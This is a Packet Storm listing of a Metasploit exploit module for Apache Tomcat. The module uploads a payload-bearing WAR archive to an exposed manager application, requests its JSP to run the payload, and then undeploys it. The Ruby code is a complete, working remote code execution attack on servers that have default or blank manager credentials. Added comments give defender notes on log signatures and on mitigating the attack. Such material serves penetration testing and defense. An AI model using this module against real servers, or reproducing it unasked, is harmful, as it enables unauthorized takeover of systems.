packetstormJduckPACKETSTORM:86448
HistoryFeb 19, 2010 - 12:00 a.m.

Apache Tomcat Manager Application Deployer Upload and Execute

2010-02-1900:00:00
jduck
packetstormsecurity.com
106

0.906 High

EPSS

Percentile

98.5%

`##  
# $Id: tomcat_mgr_deploy.rb 8552 2010-02-18 18:18:43Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
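# Metasploit module that deploys a payload-carrying WAR through the Tomcat
# "manager" application's /deploy endpoint, requests the JSP inside it so the
# payload runs, and then calls /undeploy to remove the application again.
#
# As the comments under 'References' state, no single vulnerability is
# involved: the module depends on the manager application being reachable and
# on insecure, blank or hardcoded default passwords.
#
# Defender notes, derived from the requests built in #exploit:
# * Access logs show a PUT to <PATH>/deploy?path=/<app>, then a GET for
#   /<app>/<jsp>.jsp, then a GET to <PATH>/undeploy?path=/<app>. Both names
#   are random alphanumeric strings of 4 to 31 characters.
# * The upload is sent with Content-Type application/octet-stream.
# * If the undeploy request fails, the application presumably stays deployed
#   on the server and has to be removed by hand.
# * Restricting network access to the manager application and replacing
#   default or blank manager credentials removes the precondition.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and its single option, PATH, the URI path
  # of the manager application (default '/manager').
  #
  # @param info [Hash] metadata merged into the module description
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Tomcat Manager Application Deployer Upload and Execute',
      'Description'    => %q{
This module can be used to execute a payload on Apache Tomcat servers that
have an exposed "manager" application. The payload is uploaded as a WAR archive
containing a jsp application using a PUT request.

The manager application can also be abused using /manager/html/upload, but that
method is not implemented in this module.
},
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 8552 $',
      'References'     =>
        [
          # There is no single vulnerability associated with deployment functionality.
          # Instead, the focus has been on insecure/blank/hardcoded default passwords.

          # The following references refer to HP Operations Manager
          [ 'CVE', '2009-3843' ],
          [ 'OSVDB', '60317' ],

          # tomcat docs
          [ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ]
        ],
      'Platform'       => [ 'win' ],
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('PATH', [ true, "The URI path of the manager app (/deploy and /undeploy will be used)", '/manager'])
      ], self.class)
  end

  # Runs the three-step sequence: upload the WAR, request the JSP, undeploy.
  #
  # An upload failure aborts the run with RuntimeError. Execution and undeploy
  # failures are only reported, so the undeploy request is always attempted
  # after a successful upload.
  #
  # @raise [RuntimeError] when the upload gets no response or a non-2xx status
  def exploit
    # TODO: autodetect arch/platform from /manager/serverinfo and/or db notes
    arch = ARCH_X86
    plat = [Msf::Module::Platform::Windows]

    # Generate the WAR containing the EXE containing the payload
    jsp_name = rand_text_alphanumeric(4 + rand(32 - 4))
    war = Msf::Util::EXE.to_jsp_war(framework,
      arch, plat,
      payload.encoded,
      :jsp_name => jsp_name)

    # The same random name is used for the WAR file name and the context path.
    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    app_name = app_base + ".war"
    query_str = "?path=/" + app_base

    #
    # UPLOAD
    #
    path_tmp = datastore['PATH'] + "/deploy" + query_str
    print_status("Uploading #{war.length} bytes as #{app_name}...")
    # The second argument (20) is the response timeout for send_request_cgi.
    res = send_request_cgi({
      'uri'    => path_tmp,
      'method' => 'PUT',
      'ctype'  => 'application/octet-stream',
      'data'   => war,
    }, 20)
    unless res
      raise RuntimeError, "Upload failed on #{path_tmp} [No Response]"
    end
    if res.code < 200 || res.code >= 300
      # A 401 means the manager asked for credentials; show the challenge header.
      if res.code == 401
        print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
      end
      raise RuntimeError, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]"
    end

    #
    # EXECUTE
    #
    print_status("Executing #{app_base}...")
    res = send_request_cgi({
      'uri'    => '/' + app_base + '/' + jsp_name + '.jsp',
      'method' => 'GET'
    }, 20)

    if !res
      print_error("Execution failed on #{app_base} [No Response]")
    elsif res.code < 200 || res.code >= 300
      print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")
    end

    #
    # DELETE
    #
    path_tmp = datastore['PATH'] + "/undeploy" + query_str
    print_status("Undeploying #{app_base} ...")
    res = send_request_cgi({
      'uri'    => path_tmp,
      'method' => 'GET'
    }, 20)
    # Report path_tmp, the undeploy URI. The original interpolated `path`,
    # which is never assigned in this method, so a failed undeploy would raise
    # NameError instead of printing the message (unless a mixin supplies it).
    if !res
      print_error("WARNING: Undeployment failed on #{path_tmp} [No Response]")
    elsif res.code < 200 || res.code >= 300
      print_error("Deletion failed on #{path_tmp} [#{res.code} #{res.message}]")
    end

    handler
  end

end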
`